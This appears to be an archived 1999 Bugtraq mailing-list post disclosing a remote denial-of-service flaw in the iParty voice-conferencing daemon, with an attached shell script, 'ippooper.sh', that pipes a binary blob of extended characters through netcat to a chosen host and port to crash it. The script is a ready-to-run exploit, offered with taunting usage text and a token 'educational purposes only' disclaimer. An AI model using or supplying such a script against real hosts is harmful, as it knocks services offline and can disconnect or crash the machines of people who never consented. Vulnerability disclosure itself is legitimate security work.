iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)

[bugtraq2 () HOTMAIL COM (wh00t X)]

This is a multi-part message in MIME format.

------=_NextPart_000_e6987ad_6338d761$45c2e550
Content-type: text/plain; format=flowed;

Hi,

   iParty, by Intel Experimental Technologies Department, (unofficial
information source at http://www.bumpkinland.com/iparty/), is a small voice
conferencing program, which includes a server daemon in the download. It is
handy for quick internet voice chat, but the server can be killed by sending
a large amount of extended characters to the server port, which is 6004 by
default, without being logged. The daemon either crashes quietly or GPF
(varies from box to box).
   I've been told an advisory of some sort has already been released for
this particular vulnerability but I believe the matter needs further
attention because:

1. While there are other newer and better voice conferencing programs out,
iParty continues to be widely used.
2. This vulnerability may be worse than thought: I tested my program
(attached to message) against 4 random Windows 95/98 boxes with the daemon
running, and after 2 or 3 crashes in a row, on top of crashing the iParty
daemon, some experienced disconnection from the internet, ICQ and/or
Rnaapp.exe, and one was even forced to reboot after the Rnaapp.exe crash.

Thanks,
Ka-wh00t


_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com
------=_NextPart_000_e6987ad_6338d761$45c2e550
Content-Type: text/plain; name="ippooper.sh"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="ippooper.sh"

#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t () iname com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.


if [ "$1" = "" ]; then
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
echo "Maybe you'll get lucky."
echo ""
echo "Usage: $0 <hostname/ip> <port>"
echo "Port is probably 6004 (default port)."
echo ""
echo "Remember: You need netcat for this program to work."
echo "If you see something similar to 'nc: command not found', get netcat."
else
if [ "$2" = "" ]; then
echo "I said the port is probably 6004, try that."
exit
else
rm -f ipp00p
cat > ipp00p << _EOF_
$6ì]}tTÕµ?"̐aœp/˜HÔD†0iAá½L%Ï̂EBEԁð'*}ÒyÓÔ¥(3êz‹nÃuèԏj+¨°(֗քd'‰™øZiXåËy7¡'``྽ϝ     
Cµ¶ïüÖʹçî³ÏÞçì½Ï>çܐE¢6‡â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§
„8ÂӁ'L5"ïé²±žá¤¸DRGÒIôlq„Y­g›»ÒiƒÆiÕ¾ëH¹H„w‹òá½²»Ô3ðlŽš*oÎ#ésC9m,

_EOF_
echo ""
echo "Sending kill..."
cat ipp00p | nc $1 $2
echo "Done."
rm -f ipp00p
fi
fi

------=_NextPart_000_e6987ad_6338d761$45c2e550--